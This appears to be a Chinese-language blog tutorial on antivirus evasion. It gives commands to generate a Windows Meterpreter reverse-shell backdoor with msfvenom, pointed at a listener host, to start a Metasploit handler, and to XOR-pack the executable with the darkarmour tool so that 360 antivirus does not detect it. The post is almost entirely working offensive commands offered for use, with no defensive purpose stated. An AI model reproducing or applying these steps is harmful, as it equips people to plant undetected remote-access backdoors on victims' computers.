首页 > 其他分享 >免杀之:exe加壳免杀

免杀之:exe加壳免杀

时间:2022-08-14 19:46:15浏览次数:85  
标签:exe 免杀 w64 exploit mingw 加壳免

免杀之:exe加壳免杀

目录

1 环境准备

  1. 安装信赖文件:

    apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode
    
  2. bats3c/darkarmour: Windows AV Evasion (github.com)

2 生成后门文件

  1. 利用MSF生成exe后门

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.50.2 lport=4444 -f exe -o exploit.exe
    
  2. kali监听

    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.50.2
    

3 加壳

  1. 使用darkarmour对exploit.exe后门加壳

    ./darkarmour.py -f exploit.exe -e xor --jmp -o evil.exe -l 5
    
  2. 360免杀

    image-20220814162514347

标签:exe,免杀,w64,exploit,mingw,加壳免
From: https://www.cnblogs.com/f-carey/p/16586128.html

相关文章

  • 免杀之:C# XOR Shellcode
    免杀之:C#XORShellcode目录免杀之:C#XORShellcode1环境准备2制作Shellcode后门文件2.1编译环境准备2.2生成XORKryptor程序1环境准备antman1p/ShellCodeRunner:......